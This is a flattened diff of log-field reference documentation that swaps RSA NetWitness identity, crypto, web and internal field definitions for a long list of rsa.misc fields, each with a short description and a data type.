-*`rsa.identity.user_role`*:: +*`rsa.misc.result_code`*:: + -- -This key is used to capture the Role of a user only +This key is used to capture the outcome/result numeric value of an action in a session type: keyword -- -*`rsa.identity.dn`*:: +*`rsa.misc.category`*:: + -- -X.500 (LDAP) Distinguished Name +This key is used to capture the category of an event given by the vendor in the session type: keyword -- -*`rsa.identity.logon_type`*:: +*`rsa.misc.obj_name`*:: + -- -This key is used to capture the type of logon method used. +This is used to capture name of object type: keyword -- -*`rsa.identity.profile`*:: +*`rsa.misc.obj_type`*:: + -- -This key is used to capture the user profile +This is used to capture type of object type: keyword -- -*`rsa.identity.accesses`*:: +*`rsa.misc.event_source`*:: + -- -This key is used to capture actual privileges used in accessing an object +This key captures Source of the event that’s not a hostname type: keyword -- -*`rsa.identity.realm`*:: +*`rsa.misc.log_session_id`*:: + -- -Radius realm or similar grouping of accounts +This key is used to capture a sessionid from the session directly type: keyword -- -*`rsa.identity.user_sid_dst`*:: +*`rsa.misc.group`*:: + -- -This key captures Destination User Session ID +This key captures the Group Name value type: keyword -- -*`rsa.identity.dn_src`*:: +*`rsa.misc.policy_name`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn +This key is used to capture the Policy Name only. type: keyword -- -*`rsa.identity.org`*:: +*`rsa.misc.rule_name`*:: + -- -This key captures the User organization +This key captures the Rule Name type: keyword -- -*`rsa.identity.dn_dst`*:: +*`rsa.misc.context`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn +This key captures Information which adds additional context to the event. type: keyword -- -*`rsa.identity.firstname`*:: +*`rsa.misc.change_new`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +This key is used to capture the new values of the attribute that’s changing in a session type: keyword -- -*`rsa.identity.lastname`*:: +*`rsa.misc.space`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.identity.user_dept`*:: +*`rsa.misc.client`*:: + -- -User's Department Names only +This key is used to capture only the name of the client application requesting resources of the server. See the user.agent meta key for capture of the specific user agent identifier or browser identification string. type: keyword -- -*`rsa.identity.user_sid_src`*:: +*`rsa.misc.msgIdPart1`*:: + -- -This key captures Source User Session ID - type: keyword -- -*`rsa.identity.federated_sp`*:: +*`rsa.misc.msgIdPart2`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. - type: keyword -- -*`rsa.identity.federated_idp`*:: +*`rsa.misc.change_old`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. +This key is used to capture the old value of the attribute that’s changing in a session type: keyword -- -*`rsa.identity.logon_type_desc`*:: +*`rsa.misc.operation_id`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. +An alert number or operation number. The values should be unique and non-repeating. type: keyword -- -*`rsa.identity.middlename`*:: +*`rsa.misc.event_state`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information +This key captures the current state of the object/item referenced within the event. Describing an on-going event. type: keyword -- -*`rsa.identity.password`*:: +*`rsa.misc.group_object`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted +This key captures a collection/grouping of entities. Specific usage type: keyword -- -*`rsa.identity.host_role`*:: +*`rsa.misc.node`*:: + -- -This key should only be used to capture the role of a Host Machine +Common use case is the node name within a cluster. The cluster name is reflected by the host name. type: keyword -- -*`rsa.identity.ldap`*:: +*`rsa.misc.rule`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context +This key captures the Rule number type: keyword -- -*`rsa.identity.ldap_query`*:: +*`rsa.misc.device_name`*:: + -- -This key is the Search criteria from an LDAP search +This is used to capture name of the Device associated with the node Like: a physical disk, printer, etc type: keyword -- -*`rsa.identity.ldap_response`*:: +*`rsa.misc.param`*:: + -- -This key is to capture Results from an LDAP search +This key is the parameters passed as part of a command or application, etc. type: keyword -- -*`rsa.identity.owner`*:: +*`rsa.misc.change_attrib`*:: + -- -This is used to capture username the process or service is running as, the author of the task +This key is used to capture the name of the attribute that’s changing in a session type: keyword -- -*`rsa.identity.service_account`*:: +*`rsa.misc.event_computer`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage +This key is a windows only concept, where this key is used to capture fully qualified domain name in a windows log. type: keyword -- - -*`rsa.email.email_dst`*:: +*`rsa.misc.reference_id1`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email +This key is for Linked ID to be used as an addition to "reference.id" type: keyword -- -*`rsa.email.email_src`*:: +*`rsa.misc.event_log`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email +This key captures the Name of the event log type: keyword -- -*`rsa.email.subject`*:: +*`rsa.misc.OS`*:: + -- -This key is used to capture the subject string from an Email only. +This key captures the Name of the Operating System type: keyword -- -*`rsa.email.email`*:: +*`rsa.misc.terminal`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear +This key captures the Terminal Names only type: keyword -- -*`rsa.email.trans_from`*:: +*`rsa.misc.msgIdPart3`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.email.trans_to`*:: +*`rsa.misc.filter`*:: + -- -Deprecated key defined only in table map. +This key captures Filter used to reduce result set type: keyword -- - -*`rsa.file.privilege`*:: +*`rsa.misc.serial_number`*:: + -- -Deprecated, use permissions +This key is the Serial number associated with a physical asset. type: keyword -- -*`rsa.file.attachment`*:: +*`rsa.misc.checksum`*:: + -- -This key captures the attachment file name +This key is used to capture the checksum or hash of the entity such as a file or process. Checksum should be used over checksum.src or checksum.dst when it is unclear whether the entity is a source or target of an action. type: keyword -- -*`rsa.file.filesystem`*:: +*`rsa.misc.event_user`*:: + -- +This key is a windows only concept, where this key is used to capture combination of domain name and username in a windows log. + type: keyword -- -*`rsa.file.binary`*:: +*`rsa.misc.virusname`*:: + -- -Deprecated key defined only in table map. +This key captures the name of the virus type: keyword -- -*`rsa.file.filename_dst`*:: +*`rsa.misc.content_type`*:: + -- -This is used to capture name of the file targeted by the action +This key is used to capture Content Type only. type: keyword -- -*`rsa.file.filename_src`*:: +*`rsa.misc.group_id`*:: + -- -This is used to capture name of the parent filename, the file which performed the action +This key captures Group ID Number (related to the group name) type: keyword -- -*`rsa.file.filename_tmp`*:: +*`rsa.misc.policy_id`*:: + -- +This key is used to capture the Policy ID only, this should be a numeric value, use policy.name otherwise + type: keyword -- -*`rsa.file.directory_dst`*:: +*`rsa.misc.vsys`*:: + -- -This key is used to capture the directory of the target process or file +This key captures Virtual System Name type: keyword -- -*`rsa.file.directory_src`*:: +*`rsa.misc.connection_id`*:: + -- -This key is used to capture the directory of the source process or file +This key captures the Connection ID type: keyword -- -*`rsa.file.file_entropy`*:: +*`rsa.misc.reference_id2`*:: + -- -This is used to capture entropy vale of a file +This key is for the 2nd Linked ID. Can be either linked to "reference.id" or "reference.id1" value but should not be used unless the other two variables are in play. -type: double +type: keyword -- -*`rsa.file.file_vendor`*:: +*`rsa.misc.sensor`*:: + -- -This is used to capture Company name of file located in version_info +This key captures Name of the sensor. Typically used in IDS/IPS based devices type: keyword -- -*`rsa.file.task_name`*:: +*`rsa.misc.sig_id`*:: + -- -This is used to capture name of the task +This key captures IDS/IPS Int Signature ID -type: keyword +type: long -- - -*`rsa.web.fqdn`*:: +*`rsa.misc.port_name`*:: + -- -Fully Qualified Domain Names +This key is used for Physical or logical port connection but does NOT include a network port. (Example: Printer port name). type: keyword -- -*`rsa.web.web_cookie`*:: +*`rsa.misc.rule_group`*:: + -- -This key is used to capture the Web cookies specifically. +This key captures the Rule group name type: keyword -- -*`rsa.web.alias_host`*:: +*`rsa.misc.risk_num`*:: + -- -type: keyword +This key captures a Numeric Risk value + +type: double -- -*`rsa.web.reputation_num`*:: +*`rsa.misc.trigger_val`*:: + -- -Reputation Number of an entity. Typically used for Web Domains +This key captures the Value of the trigger or threshold condition. -type: double +type: keyword -- -*`rsa.web.web_ref_domain`*:: +*`rsa.misc.log_session_id1`*:: + -- -Web referer's domain +This key is used to capture a Linked (Related) Session ID from the session directly type: keyword -- -*`rsa.web.web_ref_query`*:: +*`rsa.misc.comp_version`*:: + -- -This key captures Web referer's query portion of the URL +This key captures the Version level of a sub-component of a product. type: keyword -- -*`rsa.web.remote_domain`*:: +*`rsa.misc.content_version`*:: + -- +This key captures Version level of a signature or database content. + type: keyword -- -*`rsa.web.web_ref_page`*:: +*`rsa.misc.hardware_id`*:: + -- -This key captures Web referer's page information +This key is used to capture unique identifier for a device or system (NOT a Mac address) type: keyword -- -*`rsa.web.web_ref_root`*:: +*`rsa.misc.risk`*:: + -- -Web referer's root URL path +This key captures the non-numeric risk value type: keyword -- -*`rsa.web.cn_asn_dst`*:: +*`rsa.misc.event_id`*:: + -- type: keyword -- -*`rsa.web.cn_rpackets`*:: +*`rsa.misc.reason`*:: + -- type: keyword -- -*`rsa.web.urlpage`*:: +*`rsa.misc.status`*:: + -- type: keyword -- -*`rsa.web.urlroot`*:: +*`rsa.misc.mail_id`*:: + -- +This key is used to capture the mailbox id/name + type: keyword -- -*`rsa.web.p_url`*:: +*`rsa.misc.rule_uid`*:: + -- +This key is the Unique Identifier for a rule. + type: keyword -- -*`rsa.web.p_user_agent`*:: +*`rsa.misc.trigger_desc`*:: + -- +This key captures the Description of the trigger or threshold condition. + type: keyword -- -*`rsa.web.p_web_cookie`*:: +*`rsa.misc.inout`*:: + -- type: keyword -- -*`rsa.web.p_web_method`*:: +*`rsa.misc.p_msgid`*:: + -- type: keyword -- -*`rsa.web.p_web_referer`*:: +*`rsa.misc.data_type`*:: + -- type: keyword -- -*`rsa.web.web_extension_tmp`*:: +*`rsa.misc.msgIdPart4`*:: + -- type: keyword -- -*`rsa.web.web_page`*:: +*`rsa.misc.error`*:: + -- +This key captures All non successful Error codes or responses + type: keyword -- - -*`rsa.threat.threat_category`*:: +*`rsa.misc.index`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert - type: keyword -- -*`rsa.threat.threat_desc`*:: +*`rsa.misc.listnum`*:: + -- -This key is used to capture the threat description from the session directly or inferred +This key is used to capture listname or listnumber, primarily for collecting access-list type: keyword -- -*`rsa.threat.alert`*:: +*`rsa.misc.ntype`*:: + -- -This key is used to capture name of the alert - type: keyword -- -*`rsa.threat.threat_source`*:: +*`rsa.misc.observed_val`*:: + -- -This key is used to capture source of the threat +This key captures the Value observed (from the perspective of the device generating the log). type: keyword -- - -*`rsa.crypto.crypto`*:: +*`rsa.misc.policy_value`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only +This key captures the contents of the policy. This contains details about the policy type: keyword -- -*`rsa.crypto.cipher_src`*:: +*`rsa.misc.pool_name`*:: + -- -This key is for Source (Client) Cipher +This key captures the name of a resource pool type: keyword -- -*`rsa.crypto.cert_subject`*:: +*`rsa.misc.rule_template`*:: + -- -This key is used to capture the Certificate organization only +A default set of parameters which are overlayed onto a rule (or rulename) which efffectively constitutes a template type: keyword -- -*`rsa.crypto.peer`*:: +*`rsa.misc.count`*:: + -- -This key is for Encryption peer's IP Address - type: keyword -- -*`rsa.crypto.cipher_size_src`*:: +*`rsa.misc.number`*:: + -- -This key captures Source (Client) Cipher Size - -type: long +type: keyword -- -*`rsa.crypto.ike`*:: +*`rsa.misc.sigcat`*:: + -- -IKE negotiation phase. - type: keyword -- -*`rsa.crypto.scheme`*:: +*`rsa.misc.type`*:: + -- -This key captures the Encryption scheme used - type: keyword -- -*`rsa.crypto.peer_id`*:: +*`rsa.misc.comments`*:: + -- -This key is for Encryption peer’s identity +Comment information provided in the log message type: keyword -- -*`rsa.crypto.sig_type`*:: +*`rsa.misc.doc_number`*:: + -- -This key captures the Signature Type +This key captures File Identification number -type: keyword +type: long -- -*`rsa.crypto.cert_issuer`*:: +*`rsa.misc.expected_val`*:: + -- +This key captures the Value expected (from the perspective of the device generating the log). + type: keyword -- -*`rsa.crypto.cert_host_name`*:: +*`rsa.misc.job_num`*:: + -- -Deprecated key defined only in table map. +This key captures the Job Number type: keyword -- -*`rsa.crypto.cert_error`*:: +*`rsa.misc.spi_dst`*:: + -- -This key captures the Certificate Error String +Destination SPI Index type: keyword -- -*`rsa.crypto.cipher_dst`*:: +*`rsa.misc.spi_src`*:: + -- -This key is for Destination (Server) Cipher +Source SPI Index type: keyword -- -*`rsa.crypto.cipher_size_dst`*:: +*`rsa.misc.code`*:: + -- -This key captures Destination (Server) Cipher Size - -type: long +type: keyword -- -*`rsa.crypto.ssl_ver_src`*:: +*`rsa.misc.agent_id`*:: + -- -Deprecated, use version +This key is used to capture agent id type: keyword -- -*`rsa.crypto.d_certauth`*:: +*`rsa.misc.message_body`*:: + -- +This key captures the The contents of the message body. + type: keyword -- -*`rsa.crypto.s_certauth`*:: +*`rsa.misc.phone`*:: + -- type: keyword -- -*`rsa.crypto.ike_cookie1`*:: +*`rsa.misc.sig_id_str`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One +This key captures a string object of the sigid variable. type: keyword -- -*`rsa.crypto.ike_cookie2`*:: +*`rsa.misc.cmd`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two - type: keyword -- -*`rsa.crypto.cert_checksum`*:: +*`rsa.misc.misc`*:: + -- type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`rsa.misc.name`*:: + -- -This key is used for the hostname category value of a certificate - type: keyword -- -*`rsa.crypto.cert_serial`*:: +*`rsa.misc.cpu`*:: + -- -This key is used to capture the Certificate serial number only +This key is the CPU time used in the execution of the event being recorded. -type: keyword +type: long -- -*`rsa.crypto.cert_status`*:: +*`rsa.misc.event_desc`*:: + -- -This key captures Certificate validation status +This key is used to capture a description of an event available directly or inferred type: keyword -- -*`rsa.crypto.ssl_ver_dst`*:: +*`rsa.misc.sig_id1`*:: + -- -Deprecated, use version +This key captures IDS/IPS Int Signature ID. This must be linked to the sig.id -type: keyword +type: long -- -*`rsa.crypto.cert_keysize`*:: +*`rsa.misc.im_buddyid`*:: + -- type: keyword -- -*`rsa.crypto.cert_username`*:: +*`rsa.misc.im_client`*:: + -- type: keyword -- -*`rsa.crypto.https_insact`*:: +*`rsa.misc.im_userid`*:: + -- type: keyword -- -*`rsa.crypto.https_valid`*:: +*`rsa.misc.pid`*:: + -- type: keyword -- -*`rsa.crypto.cert_ca`*:: +*`rsa.misc.priority`*:: + -- -This key is used to capture the Certificate signing authority only - type: keyword -- -*`rsa.crypto.cert_common`*:: +*`rsa.misc.context_subject`*:: + -- -This key is used to capture the Certificate common name only +This key is to be used in an audit context where the subject is the object being identified type: keyword -- - -*`rsa.wireless.wlan_ssid`*:: +*`rsa.misc.context_target`*:: + -- -This key is used to capture the ssid of a Wireless Session - type: keyword -- -*`rsa.wireless.access_point`*:: +*`rsa.misc.cve`*:: + -- -This key is used to capture the access point name. +This key captures CVE (Common Vulnerabilities and Exposures) - an identifier for known information security vulnerabilities. type: keyword -- -*`rsa.wireless.wlan_channel`*:: +*`rsa.misc.fcatnum`*:: + -- -This is used to capture the channel names +This key captures Filter Category Number. Legacy Usage -type: long +type: keyword -- -*`rsa.wireless.wlan_name`*:: +*`rsa.misc.library`*:: + -- -This key captures either WLAN number/name +This key is used to capture library information in mainframe devices type: keyword -- - -*`rsa.storage.disk_volume`*:: +*`rsa.misc.parent_node`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk +This key captures the Parent Node Name. Must be related to node variable. type: keyword -- -*`rsa.storage.lun`*:: +*`rsa.misc.risk_info`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.storage.pwwn`*:: +*`rsa.misc.tcp_flags`*:: + -- -This uniquely identifies a port on a HBA. +This key is captures the TCP flags set in any packet of session -type: keyword +type: long -- - -*`rsa.physical.org_dst`*:: +*`rsa.misc.tos`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. +This key describes the type of service -type: keyword +type: long -- -*`rsa.physical.org_src`*:: +*`rsa.misc.vm_target`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. +VMWare Target **VMWARE** only varaible. type: keyword -- - -*`rsa.healthcare.patient_fname`*:: +*`rsa.misc.workspace`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +This key captures Workspace Description type: keyword -- -*`rsa.healthcare.patient_id`*:: +*`rsa.misc.command`*:: + -- -This key captures the unique ID for a patient - type: keyword -- -*`rsa.healthcare.patient_lname`*:: +*`rsa.misc.event_category`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.healthcare.patient_mname`*:: +*`rsa.misc.facilityname`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- - -*`rsa.endpoint.host_state`*:: +*`rsa.misc.forensic_info`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on - type: keyword -- -*`rsa.endpoint.registry_key`*:: +*`rsa.misc.jobname`*:: + -- -This key captures the path to the registry key - type: keyword -- -*`rsa.endpoint.registry_value`*:: +*`rsa.misc.mode`*:: + -- -This key captures values or decorators used within a registry entry - type: keyword -- -[[exported-fields-sophos]] -== sophos fields - -sophos Module - - - -*`network.interface.name`*:: +*`rsa.misc.policy`*:: + -- -Name of the network interface where the traffic has been observed. - - type: keyword -- +*`rsa.misc.policy_waiver`*:: ++ +-- +type: keyword +-- -*`rsa.internal.msg`*:: +*`rsa.misc.second`*:: + -- -This key is used to capture the raw message that comes into the Log Decoder - type: keyword -- -*`rsa.internal.messageid`*:: +*`rsa.misc.space1`*:: + -- type: keyword -- -*`rsa.internal.event_desc`*:: +*`rsa.misc.subcategory`*:: + -- type: keyword -- -*`rsa.internal.message`*:: +*`rsa.misc.tbdstr2`*:: + -- -This key captures the contents of instant messages - type: keyword -- -*`rsa.internal.time`*:: +*`rsa.misc.alert_id`*:: + -- -This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. +Deprecated, New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) -type: date +type: keyword -- -*`rsa.internal.level`*:: +*`rsa.misc.checksum_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture the checksum or hash of the the target entity such as a process or file. -type: long +type: keyword -- -*`rsa.internal.msg_id`*:: +*`rsa.misc.checksum_src`*:: + -- -This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key is used to capture the checksum or hash of the source entity such as a file or process. type: keyword -- -*`rsa.internal.msg_vid`*:: +*`rsa.misc.fresult`*:: + -- -This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the Filter Result -type: keyword +type: long -- -*`rsa.internal.data`*:: +*`rsa.misc.payload_dst`*:: + -- -Deprecated key defined only in table map. +This key is used to capture destination payload type: keyword -- -*`rsa.internal.obj_server`*:: +*`rsa.misc.payload_src`*:: + -- -Deprecated key defined only in table map. +This key is used to capture source payload type: keyword -- -*`rsa.internal.obj_val`*:: +*`rsa.misc.pool_id`*:: + -- -Deprecated key defined only in table map. +This key captures the identifier (typically numeric field) of a resource pool type: keyword -- -*`rsa.internal.resource`*:: +*`rsa.misc.process_id_val`*:: + -- -Deprecated key defined only in table map. +This key is a failure key for Process ID when it is not an integer value type: keyword -- -*`rsa.internal.obj_id`*:: +*`rsa.misc.risk_num_comm`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number Community -type: keyword +type: double -- -*`rsa.internal.statement`*:: +*`rsa.misc.risk_num_next`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number NextGen -type: keyword +type: double -- -*`rsa.internal.audit_class`*:: +*`rsa.misc.risk_num_sand`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number SandBox -type: keyword +type: double -- -*`rsa.internal.entry`*:: +*`rsa.misc.risk_num_static`*:: + -- -Deprecated key defined only in table map. +This key captures Risk Number Static -type: keyword +type: double -- -*`rsa.internal.hcode`*:: +*`rsa.misc.risk_suspicious`*:: + -- -Deprecated key defined only in table map. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) type: keyword -- -*`rsa.internal.inode`*:: +*`rsa.misc.risk_warning`*:: + -- -Deprecated key defined only in table map. +Deprecated, use New Hunting Model (inv.*, ioc, boc, eoc, analysis.*) -type: long +type: keyword -- -*`rsa.internal.resource_class`*:: +*`rsa.misc.snmp_oid`*:: + -- -Deprecated key defined only in table map. +SNMP Object Identifier type: keyword -- -*`rsa.internal.dead`*:: +*`rsa.misc.sql`*:: + -- -Deprecated key defined only in table map. +This key captures the SQL query -type: long +type: keyword -- -*`rsa.internal.feed_desc`*:: +*`rsa.misc.vuln_ref`*:: + -- -This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness +This key captures the Vulnerability Reference details type: keyword -- -*`rsa.internal.feed_name`*:: +*`rsa.misc.acl_id`*:: + -- -This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.cid`*:: +*`rsa.misc.acl_op`*:: + -- -This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_class`*:: +*`rsa.misc.acl_pos`*:: + -- -This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_group`*:: +*`rsa.misc.acl_table`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_host`*:: +*`rsa.misc.admin`*:: + -- -This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_ip`*:: +*`rsa.misc.alarm_id`*:: + -- -This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.device_ipv6`*:: +*`rsa.misc.alarmname`*:: + -- -This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.device_type`*:: +*`rsa.misc.app_id`*:: + -- -This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.device_type_id`*:: +*`rsa.misc.audit`*:: + -- -Deprecated key defined only in table map. - -type: long +type: keyword -- -*`rsa.internal.did`*:: +*`rsa.misc.audit_object`*:: + -- -This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.entropy_req`*:: +*`rsa.misc.auditdata`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.entropy_res`*:: +*`rsa.misc.benchmark`*:: + -- -This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration - -type: long +type: keyword -- -*`rsa.internal.event_name`*:: +*`rsa.misc.bypass`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.feed_category`*:: +*`rsa.misc.cache`*:: + -- -This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.forward_ip`*:: +*`rsa.misc.cache_hit`*:: + -- -This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. - -type: ip +type: keyword -- -*`rsa.internal.forward_ipv6`*:: +*`rsa.misc.cefversion`*:: + -- -This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: ip +type: keyword -- -*`rsa.internal.header_id`*:: +*`rsa.misc.cfg_attr`*:: + -- -This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_cid`*:: +*`rsa.misc.cfg_obj`*:: + -- -This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.lc_ctime`*:: +*`rsa.misc.cfg_path`*:: + -- -This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: date +type: keyword -- -*`rsa.internal.mcb_req`*:: +*`rsa.misc.changes`*:: + -- -This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcb_res`*:: +*`rsa.misc.client_ip`*:: + -- -This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most - -type: long +type: keyword -- -*`rsa.internal.mcbc_req`*:: +*`rsa.misc.clustermembers`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.mcbc_res`*:: +*`rsa.misc.cn_acttimeout`*:: + -- -This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams - -type: long +type: keyword -- -*`rsa.internal.medium`*:: +*`rsa.misc.cn_asn_src`*:: + -- -This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session - -type: long +type: keyword -- -*`rsa.internal.node_name`*:: +*`rsa.misc.cn_bgpv4nxthop`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.nwe_callback_id`*:: +*`rsa.misc.cn_ctr_dst_code`*:: + -- -This key denotes that event is endpoint related - type: keyword -- -*`rsa.internal.parse_error`*:: +*`rsa.misc.cn_dst_tos`*:: + -- -This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.payload_req`*:: +*`rsa.misc.cn_dst_vlan`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.payload_res`*:: +*`rsa.misc.cn_engine_id`*:: + -- -This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep - -type: long +type: keyword -- -*`rsa.internal.process_vid_dst`*:: +*`rsa.misc.cn_engine_type`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. - type: keyword -- -*`rsa.internal.process_vid_src`*:: +*`rsa.misc.cn_f_switch`*:: + -- -Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. - type: keyword -- -*`rsa.internal.rid`*:: +*`rsa.misc.cn_flowsampid`*:: + -- -This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.session_split`*:: +*`rsa.misc.cn_flowsampintv`*:: + -- -This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.site`*:: +*`rsa.misc.cn_flowsampmode`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.internal.size`*:: +*`rsa.misc.cn_inacttimeout`*:: + -- -This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - -type: long +type: keyword -- -*`rsa.internal.sourcefile`*:: +*`rsa.misc.cn_inpermbyts`*:: + -- -This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.internal.ubc_req`*:: +*`rsa.misc.cn_inpermpckts`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.ubc_res`*:: +*`rsa.misc.cn_invalid`*:: + -- -This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once - -type: long +type: keyword -- -*`rsa.internal.word`*:: +*`rsa.misc.cn_ip_proto_ver`*:: + -- -This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log - type: keyword -- - -*`rsa.time.event_time`*:: +*`rsa.misc.cn_ipv4_ident`*:: + -- -This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form - -type: date +type: keyword -- -*`rsa.time.duration_time`*:: +*`rsa.misc.cn_l_switch`*:: + -- -This key is used to capture the normalized duration/lifetime in seconds. - -type: double +type: keyword -- -*`rsa.time.event_time_str`*:: +*`rsa.misc.cn_log_did`*:: + -- -This key is used to capture the incomplete time mentioned in a session as a string - type: keyword -- -*`rsa.time.starttime`*:: +*`rsa.misc.cn_log_rid`*:: + -- -This key is used to capture the Start time mentioned in a session in a standard form - -type: date +type: keyword -- -*`rsa.time.month`*:: 